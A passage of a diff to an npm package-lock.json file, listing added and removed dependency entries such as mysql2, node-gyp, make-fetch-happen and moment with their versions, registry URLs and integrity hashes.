"sha512-8Rf9Y83NBReMnx0gFzA8JImQACstCYWUplepDa9xprwwtmgEZUF0h/i5xSA625zB/I37EtrswSST6OXxwaaIJQ==", + "optional": true + }, "node_modules/hasown": { "version": "2.0.2", "resolved": "https://registry.npmjs.org/hasown/-/hasown-2.0.2.tgz", "integrity": "sha512-0hJU9SCPvmMzIBdZFqNPXWa6dqh7WdH0cII9y+CyS8rG3nL48Bclra9HmKhVVUHyPWNH5Y7xDwAB7bfgSjkUMQ==", - "dev": true, "dependencies": { "function-bind": "^1.1.2" }, @@ -305,103 +826,1075 @@ "node": ">= 0.4" } }, - "node_modules/is-core-module": { - "version": "2.13.1", - "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.13.1.tgz", - "integrity": "sha512-hHrIjvZsftOsvKSn2TRYl63zvxsgE0K+0mYMoH6gD4omR5IWB2KynivBQczo3+wF1cCkjzvptnI9Q0sPU66ilw==", - "dev": true, + "node_modules/http-cache-semantics": { + "version": "4.1.1", + "resolved": "https://registry.npmjs.org/http-cache-semantics/-/http-cache-semantics-4.1.1.tgz", + "integrity": "sha512-er295DKPVsV82j5kw1Gjt+ADA/XYHsajl82cGNQG2eyoPkvgUhX+nDIyelzhIWbbsXP39EHcI6l5tYs2FYqYXQ==", + "optional": true + }, + "node_modules/http-proxy-agent": { + "version": "4.0.1", + "resolved": "https://registry.npmjs.org/http-proxy-agent/-/http-proxy-agent-4.0.1.tgz", + "integrity": "sha512-k0zdNgqWTGA6aeIRVpvfVob4fL52dTfaehylg0Y4UvSySvOq/Y+BOyPrgpUrA7HylqvU8vIZGsRuXmspskV0Tg==", + "optional": true, "dependencies": { - "hasown": "^2.0.0" + "@tootallnate/once": "1", + "agent-base": "6", + "debug": "4" }, - "funding": { - "url": "https://github.com/sponsors/ljharb" + "engines": { + "node": ">= 6" } }, - "node_modules/js-tokens": { - "version": "3.0.2", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-3.0.2.tgz", - "integrity": "sha512-RjTcuD4xjtthQkaWH7dFlH85L+QaVtSoOyGdZ3g6HFhS9dFNDfLyqgm2NFe2X6cQpeFmt0452FJjFG5UameExg==", - "dev": true - }, - "node_modules/jsesc": { - "version": "2.5.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-2.5.2.tgz", - "integrity": "sha512-OYu7XEzjkCQ3C5Ps3QIZsQfNpqoJyZZA99wd9aWd05NCtC5pWOkShK2mkL6HXQR6/Cy2lbNdPlZBpuQHXE63gA==", - "dev": true, - "bin": { - "jsesc": "bin/jsesc" + "node_modules/http-proxy-agent/node_modules/debug": { + "version": "4.3.7", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.7.tgz", + "integrity": "sha512-Er2nc/H7RrMXZBFCEim6TCmMk02Z8vLC2Rbi1KEBggpo0fS6l0S1nnapwmIi3yW/+GOJap1Krg4w0Hg80oCqgQ==", + "optional": true, + "dependencies": { + "ms": "^2.1.3" }, "engines": { - "node": ">=4" + "node": ">=6.0" + }, + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } } }, - "node_modules/json5": { - "version": "0.5.1", - "resolved": "https://registry.npmjs.org/json5/-/json5-0.5.1.tgz", - "integrity": "sha512-4xrs1aW+6N5DalkqSVA8fxh458CXvR99WU8WLKmq4v8eWAL86Xo3BVqyd3SkA9wEVjCMqyvvRRkshAdOnBp5rw==", - "dev": true, - "bin": { - "json5": "lib/cli.js" + "node_modules/https-proxy-agent": { + "version": "5.0.1", + "resolved": "https://registry.npmjs.org/https-proxy-agent/-/https-proxy-agent-5.0.1.tgz", + "integrity": "sha512-dFcAjpTQFgoLMzC2VwU+C/CbS7uRL0lWmxDITmqm7C+7F0Odmj6s9l6alZc6AELXhrnggM2CeWSXHGOdX2YtwA==", + "optional": true, + "dependencies": { + "agent-base": "6", + "debug": "4" + }, + "engines": { + "node": ">= 6" } }, - "node_modules/lodash": { - "version": "4.16.1", - "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.16.1.tgz", - "integrity": "sha512-qK+vzI6bQ91q3gkfBKpO0rgR0qV6ECjT1+ZBprnFejldHGi74AQ9MPWfSreqqzaF0aLRC7qnnYb5AjTwLXSNKw==" - }, - "node_modules/ms": { - "version": "2.1.3", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", - "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==", - "dev": true - }, - "node_modules/path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "node_modules/resolve": { - "version": "1.22.8", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.8.tgz", - "integrity": "sha512-oKWePCxqpd6FlLvGV1VU0x7bkPmmCNolxzjMf4NczoDnQcIWrAF+cPtZn5i6n+RfD2d9i0tzpKnG6Yk168yIyw==", - "dev": true, + "node_modules/https-proxy-agent/node_modules/debug": { + "version": "4.3.7", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.7.tgz", + "integrity": "sha512-Er2nc/H7RrMXZBFCEim6TCmMk02Z8vLC2Rbi1KEBggpo0fS6l0S1nnapwmIi3yW/+GOJap1Krg4w0Hg80oCqgQ==", + "optional": true, "dependencies": { - "is-core-module": "^2.13.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" + "ms": "^2.1.3" }, - "bin": { - "resolve": "bin/resolve" + "engines": { + "node": ">=6.0" }, - "funding": { - "url": "https://github.com/sponsors/ljharb" + "peerDependenciesMeta": { + "supports-color": { + "optional": true + } } }, - "node_modules/semver": { - "version": "5.4.1", - "resolved": "https://registry.npmjs.org/semver/-/semver-5.4.1.tgz", - "integrity": "sha512-WfG/X9+oATh81XtllIo/I8gOiY9EXRdv1cQdyykeXK17YcUW3EXUAi2To4pcH6nZtJPr7ZOpM5OMyWJZm+8Rsg==", - "bin": { - "semver": "bin/semver" + "node_modules/humanize-ms": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/humanize-ms/-/humanize-ms-1.2.1.tgz", + "integrity": "sha512-Fl70vYtsAFb/C06PTS9dZBo7ihau+Tu/DNCk/OyHhea07S+aeMWpFFkUaXRa8fI+ScZbEI8dfSxwY7gxZ9SAVQ==", + "optional": true, + "dependencies": { + "ms": "^2.0.0" } }, - "node_modules/source-map": { - "version": "0.5.7", - "resolved": "https://registry.npmjs.org/source-map/-/source-map-0.5.7.tgz", - "integrity": "sha512-LbrmJOMUSdEVxIKvdcJzQC+nQhe8FUZQTXQy6+I75skNgn3OoQ0DZA8YnFa7gp8tqtL3KPf1kmo0R5DoApeSGQ==", - "dev": true, + "node_modules/iconv-lite": { + "version": "0.6.3", + "resolved": "https://registry.npmjs.org/iconv-lite/-/iconv-lite-0.6.3.tgz", + "integrity": "sha512-4fCk79wshMdzMp2rH06qWrJE4iolqLhCUH+OiuIgU++RB0+94NlDL81atO7GX55uUKueo0txHNtvEyI6D7WdMw==", + "dependencies": { + "safer-buffer": ">= 2.1.2 < 3.0.0" + }, "engines": { "node": ">=0.10.0" } }, - "node_modules/supports-color": { - "version": "5.5.0", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-5.5.0.tgz", - "integrity": "sha512-QjVjwdXIt408MIiAqCX4oUKsgU2EqAGzs2Ppkm4aQYbjm+ZEWEcW4SfFNTr4uMNZma0ey4f5lgLrkB0aX0QMow==", - "dev": true, - "dependencies": { - "has-flag": "^3.0.0" + "node_modules/ieee754": { + "version": "1.2.1", + "resolved": "https://registry.npmjs.org/ieee754/-/ieee754-1.2.1.tgz", + "integrity": "sha512-dcyqhDvX1C46lXZcVqCpK+FtMRQVdIMN6/Df5js2zouUsqG7I6sFxitIC+7KYK29KdXOLHdu9zL4sFnoVQnqaA==", + "funding": [ + { + "type": "github", + "url": "https://github.com/sponsors/feross" + }, + { + "type": "patreon", + "url": "https://www.patreon.com/feross" + }, + { + "type": "consulting", + "url": "https://feross.org/support" + } + ] + }, + "node_modules/imurmurhash": { + "version": "0.1.4", + "resolved": "https://registry.npmjs.org/imurmurhash/-/imurmurhash-0.1.4.tgz", + "integrity": "sha512-JmXMZ6wuvDmLiHEml9ykzqO6lwFbof0GG4IkcGaENdCRDDmMVnny7s5HsIgHCbaq0w2MyPhDqkhTUgS2LU2PHA==", + "optional": true, + "engines": { + "node": ">=0.8.19" + } + }, + "node_modules/indent-string": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/indent-string/-/indent-string-4.0.0.tgz", + "integrity": "sha512-EdDDZu4A2OyIK7Lr/2zG+w5jmbuk1DVBnEwREQvBzspBJkCEbRa8GxU1lghYcaGJCnRWibjDXlq779X1/y5xwg==", + "optional": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/infer-owner": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/infer-owner/-/infer-owner-1.0.4.tgz", + "integrity": "sha512-IClj+Xz94+d7irH5qRyfJonOdfTzuDaifE6ZPWfx0N0+/ATZCbuTPq2prFl526urkQd90WyUKIh1DfBQ2hMz9A==", + "optional": true + }, + "node_modules/inflection": { + "version": "1.12.0", + "resolved": "https://registry.npmjs.org/inflection/-/inflection-1.12.0.tgz", + "integrity": "sha512-lRy4DxuIFWXlJU7ed8UiTJOSTqStqYdEb4CEbtXfNbkdj3nH1L+reUWiE10VWcJS2yR7tge8Z74pJjtBjNwj0w==", + "engines": [ + "node >= 0.4.0" + ] + }, + "node_modules/inflight": { + "version": "1.0.6", + "resolved": "https://registry.npmjs.org/inflight/-/inflight-1.0.6.tgz", + "integrity": "sha512-k92I/b08q4wvFscXCLvqfsHCrjrF7yiXsQuIVvVE7N82W3+aqpzuUdBbfhWcy/FZR3/4IgflMgKLOsvPDrGCJA==", + "deprecated": "This module is not supported, and leaks memory. Do not use it. Check out lru-cache if you want a good and tested way to coalesce async requests by a key value, which is much more comprehensive and powerful.", + "optional": true, + "dependencies": { + "once": "^1.3.0", + "wrappy": "1" + } + }, + "node_modules/inherits": { + "version": "2.0.4", + "resolved": "https://registry.npmjs.org/inherits/-/inherits-2.0.4.tgz", + "integrity": "sha512-k/vGaX4/Yla3WzyMCvTQOXYeIHvqOKtnqBduzTHpzpQZzAskKMhZ2K+EnBiSM9zGSoIFeMpXKxa4dYeZIQqewQ==" + }, + "node_modules/ini": { + "version": "1.3.8", + "resolved": "https://registry.npmjs.org/ini/-/ini-1.3.8.tgz", + "integrity": "sha512-JV/yugV2uzW5iMRSiZAyDtQd+nxtUnjeLt0acNdw98kKLrvuRVyB80tsREOE7yvGVgalhZ6RNXCmEHkUKBKxew==" + }, + "node_modules/ip-address": { + "version": "9.0.5", + "resolved": "https://registry.npmjs.org/ip-address/-/ip-address-9.0.5.tgz", + "integrity": "sha512-zHtQzGojZXTwZTHQqra+ETKd4Sn3vgi7uBmlPoXVWZqYvuKmtI0l/VZTjqGmJY9x88GGOaZ9+G9ES8hC4T4X8g==", + "optional": true, + "dependencies": { + "jsbn": "1.1.0", + "sprintf-js": "^1.1.3" + }, + "engines": { + "node": ">= 12" + } + }, + "node_modules/is-bluebird": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/is-bluebird/-/is-bluebird-1.0.2.tgz", + "integrity": "sha512-PDRu1vVip5dGQg5tfn2qVCCyxbBYu5MhYUJwSfL/RoGBI97n1fxvilVazxzptZW0gcmsMH17H4EVZZI5E/RSeA==", + "engines": { + "node": ">=0.10.0" + } + }, + "node_modules/is-core-module": { + "version": "2.15.1", + "resolved": "https://registry.npmjs.org/is-core-module/-/is-core-module-2.15.1.tgz", + "integrity": "sha512-z0vtXSwucUJtANQWldhbtbt7BnL0vxiFjIdDLAatwhDYty2bad6s+rijD6Ri4YuYJubLzIJLUidCh09e1djEVQ==", + "dependencies": { + "hasown": "^2.0.2" + }, + "engines": { + "node": ">= 0.4" + }, + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/is-fullwidth-code-point": { + "version": "3.0.0", + "resolved": "https://registry.npmjs.org/is-fullwidth-code-point/-/is-fullwidth-code-point-3.0.0.tgz", + "integrity": "sha512-zymm5+u+sCsSWyD9qNaejV3DFvhCKclKdizYaJUuHA83RLjb7nSuGnddCHGv0hk+KY7BMAlsWeK4Ueg6EV6XQg==", + "optional": true, + "engines": { + "node": ">=8" + } + }, + "node_modules/is-lambda": { + "version": "1.0.1", + "resolved": "https://registry.npmjs.org/is-lambda/-/is-lambda-1.0.1.tgz", + "integrity": "sha512-z7CMFGNrENq5iFB9Bqo64Xk6Y9sg+epq1myIcdHaGnbMTYOxvzsEtdYqQUylB7LxfkvgrrjP32T6Ywciio9UIQ==", + "optional": true + }, + "node_modules/is-property": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/is-property/-/is-property-1.0.2.tgz", + "integrity": "sha512-Ks/IoX00TtClbGQr4TWXemAnktAQvYB7HzcCxDGqEZU6oCmb2INHuOoKxbtR+HFkmYWBKv/dOZtGRiAjDhj92g==" + }, + "node_modules/isexe": { + "version": "2.0.0", + "resolved": "https://registry.npmjs.org/isexe/-/isexe-2.0.0.tgz", + "integrity": "sha512-RHxMLp9lnKHGHRng9QFhRCMbYAcVpn69smSGcq3f36xjgVVWThj4qqLbTLlq7Ssj8B+fIQ1EuCEGI2lKsyQeIw==", + "optional": true + }, + "node_modules/jquery": { + "version": "2.1.0", + "resolved": "https://registry.npmjs.org/jquery/-/jquery-2.1.0.tgz", + "integrity": "sha512-QyJAvw0LUlUPci88C5LTFNtg4WFs70Dkqmwq4rZyOBflduKnHZakpIIDjhZVygAQbUqaghv6msUyP5TmRoNevQ==" + }, + "node_modules/js-tokens": { + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-3.0.2.tgz", + "integrity": "sha512-RjTcuD4xjtthQkaWH7dFlH85L+QaVtSoOyGdZ3g6HFhS9dFNDfLyqgm2NFe2X6cQpeFmt0452FJjFG5UameExg==" + }, + "node_modules/jsbn": { + "version": "1.1.0", + "resolved": "https://registry.npmjs.org/jsbn/-/jsbn-1.1.0.tgz", + "integrity": "sha512-4bYVV3aAMtDTTu4+xsDYa6sy9GyJ69/amsu9sYF2zqjiEoZA5xJi3BrfX3uY+/IekIu7MwdObdbDWpoZdBv3/A==", + "optional": true + }, + "node_modules/jsesc": { + "version": "2.5.2", + "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-2.5.2.tgz", + "integrity": "sha512-OYu7XEzjkCQ3C5Ps3QIZsQfNpqoJyZZA99wd9aWd05NCtC5pWOkShK2mkL6HXQR6/Cy2lbNdPlZBpuQHXE63gA==", + "bin": { + "jsesc": "bin/jsesc" + }, + "engines": { + "node": ">=4" + } + }, + "node_modules/json5": { + "version": "2.2.1", + "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.1.tgz", + "integrity": "sha512-1hqLFMSrGHRHxav9q9gNjJ5EXznIxGVO09xQRrwplcS8qs28pZ8s8hupZAmqDwZUmVZ2Qb2jnyPOWcDH8m8dlA==", + "bin": { + "json5": "lib/cli.js" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/lodash": { + "version": "4.16.1", + "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.16.1.tgz", + "integrity": "sha512-qK+vzI6bQ91q3gkfBKpO0rgR0qV6ECjT1+ZBprnFejldHGi74AQ9MPWfSreqqzaF0aLRC7qnnYb5AjTwLXSNKw==" + }, + "node_modules/long": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/long/-/long-4.0.0.tgz", + "integrity": "sha512-XsP+KhQif4bjX1kbuSiySJFNAehNxgLb6hPRGJ9QsUr8ajHkuXGdrHmFUTUUXhDwVX2R5bY4JNZEwbUiMhV+MA==" + }, + "node_modules/lru-cache": { + "version": "6.0.0", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", + "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/make-fetch-happen": { + "version": "9.1.0", + "resolved": "https://registry.npmjs.org/make-fetch-happen/-/make-fetch-happen-9.1.0.tgz", + "integrity": "sha512-+zopwDy7DNknmwPQplem5lAZX/eCOzSvSNNcSKm5eVwTkOBzoktEfXsa9L23J/GIRhxRsaxzkPEhrJEpE2F4Gg==", + "optional": true, + "dependencies": { + "agentkeepalive": "^4.1.3", + "cacache": "^15.2.0", + "http-cache-semantics": "^4.1.0", + "http-proxy-agent": "^4.0.1", + "https-proxy-agent": "^5.0.0", + "is-lambda": "^1.0.1", + "lru-cache": "^6.0.0", + "minipass": "^3.1.3", + "minipass-collect": "^1.0.2", + "minipass-fetch": "^1.3.2", + "minipass-flush": "^1.0.5", + "minipass-pipeline": "^1.2.4", + "negotiator": "^0.6.2", + "promise-retry": "^2.0.1", + "socks-proxy-agent": "^6.0.0", + "ssri": "^8.0.0" + }, + "engines": { + "node": ">= 10" + } + }, + "node_modules/mimic-response": { + "version": "3.1.0", + "resolved": "https://registry.npmjs.org/mimic-response/-/mimic-response-3.1.0.tgz", + "integrity": "sha512-z0yWI+4FDrrweS8Zmt4Ej5HdJmky15+L2e6Wgn3+iK5fWzb6T3fhNFq2+MeTRb064c6Wr4N/wv0DzQTjNzHNGQ==", + "engines": { + "node": ">=10" + }, + "funding": { + "url": "https://github.com/sponsors/sindresorhus" + } + }, + "node_modules/mini-html-parser": { + "version": "0.0.3", + "resolved": "https://registry.npmjs.org/mini-html-parser/-/mini-html-parser-0.0.3.tgz", + "integrity": "sha512-qFDnh3zny/LtK5VLmXIX3V+MgC/D9ZV+exiXWIeoo8aaSoVrvfgsek0VJRq24sMUMWCq0gxBo6X2bY4mMfamag==", + "dependencies": { + "debug": "~0.7.4" + } + }, + "node_modules/mini-html-parser/node_modules/debug": { + "version": "0.7.4", + "resolved": "https://registry.npmjs.org/debug/-/debug-0.7.4.tgz", + "integrity": "sha512-EohAb3+DSHSGx8carOSKJe8G0ayV5/i609OD0J2orCkuyae7SyZSz2aoLmQF2s0Pj5gITDebwPH7GFBlqOUQ1Q==", + "engines": { + "node": "*" + } + }, + "node_modules/minimatch": { + "version": "3.1.2", + "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", + "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", + "optional": true, + "dependencies": { + "brace-expansion": "^1.1.7" + }, + "engines": { + "node": "*" + } + }, + "node_modules/minimist": { + "version": "1.2.8", + "resolved": "https://registry.npmjs.org/minimist/-/minimist-1.2.8.tgz", + "integrity": "sha512-2yyAR8qBkN3YuheJanUpWC5U3bb5osDywNB8RzDVlDwDHbocAJveqqj1u8+SVD7jkWT4yvsHCpWqqWqAxb0zCA==", + "funding": { + "url": "https://github.com/sponsors/ljharb" + } + }, + "node_modules/minipass": { + "version": "3.3.6", + "resolved": "https://registry.npmjs.org/minipass/-/minipass-3.3.6.tgz", + "integrity": "sha512-DxiNidxSEK+tHG6zOIklvNOwm3hvCrbUrdtzY74U6HKTJxvIDfOUL5W5P2Ghd3DTkhhKPYGqeNUIh5qcM4YBfw==", + "dependencies": { + "yallist": "^4.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/minipass-collect": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/minipass-collect/-/minipass-collect-1.0.2.tgz", + "integrity": "sha512-6T6lH0H8OG9kITm/Jm6tdooIbogG9e0tLgpY6mphXSm/A9u8Nq1ryBG+Qspiub9LjWlBPsPS3tWQ/Botq4FdxA==", + "optional": true, + "dependencies": { + "minipass": "^3.0.0" + }, + "engines": { + "node": ">= 8" + } + }, + "node_modules/minipass-fetch": { + "version": "1.4.1", + "resolved": "https://registry.npmjs.org/minipass-fetch/-/minipass-fetch-1.4.1.tgz", + "integrity": "sha512-CGH1eblLq26Y15+Azk7ey4xh0J/XfJfrCox5LDJiKqI2Q2iwOLOKrlmIaODiSQS8d18jalF6y2K2ePUm0CmShw==", + "optional": true, + "dependencies": { + "minipass": "^3.1.0", + "minipass-sized": "^1.0.3", + "minizlib": "^2.0.0" + }, + "engines": { + "node": ">=8" + }, + "optionalDependencies": { + "encoding": "^0.1.12" + } + }, + "node_modules/minipass-flush": { + "version": "1.0.5", + "resolved": "https://registry.npmjs.org/minipass-flush/-/minipass-flush-1.0.5.tgz", + "integrity": "sha512-JmQSYYpPUqX5Jyn1mXaRwOda1uQ8HP5KAT/oDSLCzt1BYRhQU0/hDtsB1ufZfEEzMZ9aAVmsBw8+FWsIXlClWw==", + "optional": true, + "dependencies": { + "minipass": "^3.0.0" + }, + "engines": { + "node": ">= 8" + } + }, + "node_modules/minipass-pipeline": { + "version": "1.2.4", + "resolved": "https://registry.npmjs.org/minipass-pipeline/-/minipass-pipeline-1.2.4.tgz", + "integrity": "sha512-xuIq7cIOt09RPRJ19gdi4b+RiNvDFYe5JH+ggNvBqGqpQXcru3PcRmOZuHBKWK1Txf9+cQ+HMVN4d6z46LZP7A==", + "optional": true, + "dependencies": { + "minipass": "^3.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/minipass-sized": { + "version": "1.0.3", + "resolved": "https://registry.npmjs.org/minipass-sized/-/minipass-sized-1.0.3.tgz", + "integrity": "sha512-MbkQQ2CTiBMlA2Dm/5cY+9SWFEN8pzzOXi6rlM5Xxq0Yqbda5ZQy9sU75a673FE9ZK0Zsbr6Y5iP6u9nktfg2g==", + "optional": true, + "dependencies": { + "minipass": "^3.0.0" + }, + "engines": { + "node": ">=8" + } + }, + "node_modules/minizlib": { + "version": "2.1.2", + "resolved": "https://registry.npmjs.org/minizlib/-/minizlib-2.1.2.tgz", + "integrity": "sha512-bAxsR8BVfj60DWXHE3u30oHzfl4G7khkSuPW+qvpd7jFRHm7dLxOjUk1EHACJ/hxLY8phGJ0YhYHZo7jil7Qdg==", + "dependencies": { + "minipass": "^3.0.0", + "yallist": "^4.0.0" + }, + "engines": { + "node": ">= 8" + } + }, + "node_modules/mkdirp": { + "version": "1.0.4", + "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-1.0.4.tgz", + "integrity": "sha512-vVqVZQyf3WLx2Shd0qJ9xuvqgAyKPLAiqITEtqW0oIUjzo3PePDd6fW9iFz30ef7Ysp/oiWqbhszeGWW2T6Gzw==", + "bin": { + "mkdirp": "bin/cmd.js" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/mkdirp-classic": { + "version": "0.5.3", + "resolved": "https://registry.npmjs.org/mkdirp-classic/-/mkdirp-classic-0.5.3.tgz", + "integrity": "sha512-gKLcREMhtuZRwRAfqP3RFW+TK4JqApVBtOIftVgjuABpAtpxhPGaDcfvbhNvD0B8iD1oUr/txX35NjcaY6Ns/A==" + }, + "node_modules/moment": { + "version": "2.30.1", + "resolved": "https://registry.npmjs.org/moment/-/moment-2.30.1.tgz", + "integrity": "sha512-uEmtNhbDOrWPFS+hdjFCBfy9f2YoyzRpwcl+DqpC6taX21FzsTLQVbMV/W7PzNSX6x/bhC1zA3c2UQ5NzH6how==", + "engines": { + "node": "*" + } + }, + "node_modules/moment-timezone": { + "version": "0.5.45", + "resolved": "https://registry.npmjs.org/moment-timezone/-/moment-timezone-0.5.45.tgz", + "integrity": "sha512-HIWmqA86KcmCAhnMAN0wuDOARV/525R2+lOLotuGFzn4HO+FH+/645z2wx0Dt3iDv6/p61SIvKnDstISainhLQ==", + "dependencies": { + "moment": "^2.29.4" + }, + "engines": { + "node": "*" + } + }, + "node_modules/ms": { + "version": "2.1.3", + "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.3.tgz", + "integrity": "sha512-6FlzubTLZG3J2a/NVCAleEhjzq5oxgHyaCU9yYXvcLsvoVaHJq/s5xXI6/XXP6tz7R9xAOtHnSO/tXtF3WRTlA==" + }, + "node_modules/mysql2": { + "version": "2.3.3", + "resolved": "https://registry.npmjs.org/mysql2/-/mysql2-2.3.3.tgz", + "integrity": "sha512-wxJUev6LgMSgACDkb/InIFxDprRa6T95+VEoR+xPvtngtccNH2dGjEB/fVZ8yg1gWv1510c9CvXuJHi5zUm0ZA==", + "license": "MIT", + "dependencies": { + "denque": "^2.0.1", + "generate-function": "^2.3.1", + "iconv-lite": "^0.6.3", + "long": "^4.0.0", + "lru-cache": "^6.0.0", + "named-placeholders": "^1.1.2", + "seq-queue": "^0.0.5", + "sqlstring": "^2.3.2" + }, + "engines": { + "node": ">= 8.0" + } + }, + "node_modules/named-placeholders": { + "version": "1.1.3", + "resolved": "https://registry.npmjs.org/named-placeholders/-/named-placeholders-1.1.3.tgz", + "integrity": "sha512-eLoBxg6wE/rZkJPhU/xRX1WTpkFEwDJEN96oxFrTsqBdbT5ec295Q+CoHrL9IT0DipqKhmGcaZmwOt8OON5x1w==", + "dependencies": { + "lru-cache": "^7.14.1" + }, + "engines": { + "node": ">=12.0.0" + } + }, + "node_modules/named-placeholders/node_modules/lru-cache": { + "version": "7.18.3", + "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-7.18.3.tgz", + "integrity": "sha512-jumlc0BIUrS3qJGgIkWZsyfAM7NCWiBcCDhnd+3NNM5KbBmLTgHVfWBcg6W+rLUsIpzpERPsvwUP7CckAQSOoA==", + "engines": { + "node": ">=12" + } + }, + "node_modules/napi-build-utils": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/napi-build-utils/-/napi-build-utils-1.0.2.tgz", + "integrity": "sha512-ONmRUqK7zj7DWX0D9ADe03wbwOBZxNAfF20PlGfCWQcD3+/MakShIHrMqx9YwPTfxDdF1zLeL+RGZiR9kGMLdg==" + }, + "node_modules/negotiator": { + "version": "0.6.3", + "resolved": "https://registry.npmjs.org/negotiator/-/negotiator-0.6.3.tgz", + "integrity": "sha512-+EUsqGPLsM+j/zdChZjsnX51g4XrHFOIXwfnCVPGlQk/k5giakcKsuxCObBRu6DSm9opw/O6slWbJdghQM4bBg==", + "optional": true, + "engines": { + "node": ">= 0.6" + } + }, + "node_modules/node-abi": { + "version": "3.67.0", + "resolved": "https://registry.npmjs.org/node-abi/-/node-abi-3.67.0.tgz", + "integrity": "sha512-bLn/fU/ALVBE9wj+p4Y21ZJWYFjUXLXPi/IewyLZkx3ApxKDNBWCKdReeKOtD8dWpOdDCeMyLh6ZewzcLsG2Nw==", + "dependencies": { + "semver": "^7.3.5" + }, + "engines": { + "node": ">=10" + } + }, + "node_modules/node-addon-api": { + "version": "7.1.1", + "resolved": "https://registry.npmjs.org/node-addon-api/-/node-addon-api-7.1.1.tgz", + "integrity": "sha512-5m3bsyrjFWE1xf7nz7YXdN4udnVtXK6/Yfgn5qnahL6bCkf2yKt4k3nuTKAtT4r3IG8JNR2ncsIMdZuAzJjHQQ==" + }, + "node_modules/node-gyp": { + "version": "8.4.1", + "resolved": "https://registry.npmjs.org/node-gyp/-/node-gyp-8.4.1.tgz", + "integrity": "sha512-olTJRgUtAb/hOXG0E93wZDs5YiJlgbXxTwQAFHyNlRsXQnYzUaF2aGgujZbw+hR8aF4ZG/rST57bWMWD16jr9w==", + "optional": true, + "dependencies": { + "env-paths": "^2.2.0", + "glob": "^7.1.4", + "graceful-fs": "^4.2.6", + "make-fetch-happen": "^9.1.0", + "nopt": "^5.0.0", + "npmlog": "^6.0.0", + "rimraf": "^3.0.2", + "semver": "^7.3.5", + "tar": "^6.1.2", + "which": "^2.0.2" + }, + "bin": { + "node-gyp": "bin/node-gyp.js" + }, + "engines": { + "node": ">= 10.12.0" + } + }, + "node_modules/nopt": { + "version": "5.0.0", + "resolved": "https://registry.npmjs.org/nopt/-/nopt-5.0.0.tgz", + "integrity": "sha512-Tbj67rffqceeLpcRXrT7vKAN8CwfPeIBgM7E6iBkmKLV7bEMwpGgYLGv0jACUsECaa/vuxP0IjEont6umdMgtQ==", + "optional": true, + "dependencies": { + "abbrev": "1" + }, + "bin": { + "nopt": "bin/nopt.js" + }, + "engines": { + "node": ">=6" + } + }, + "node_modules/npmlog": { + "version": "6.0.2", + "resolved": "https://registry.npmjs.org/npmlog/-/npmlog-6.0.2.tgz", + "integrity": "sha512-/vBvz5Jfr9dT/aFWd0FIRf+T/Q2WBsLENygUaFUqstqsycmZAP/t5BvFJTK0viFmSUxiUKTUplWy5vt+rvKIxg==", + "deprecated": "This package is no longer supported.", + "optional": true, + "dependencies": { + "are-we-there-yet": "^3.0.0", + "console-control-strings": "^1.1.0", + "gauge": "^4.0.3", + "set-blocking": "^2.0.0" + }, + "engines": { + "node": "^12.13.0 || ^14.15.0 || >=16.0.0" + } + }, + "node_modules/once": { + "version": "1.4.0", + "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", + "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", + "dependencies": { + "wrappy": "1" + } + }, + "node_modules/p-map": { + "version": "4.0.0", + "resolved": "https://registry.npmjs.org/p-map/-/p-map-4.0.0.tgz", + "integrity": 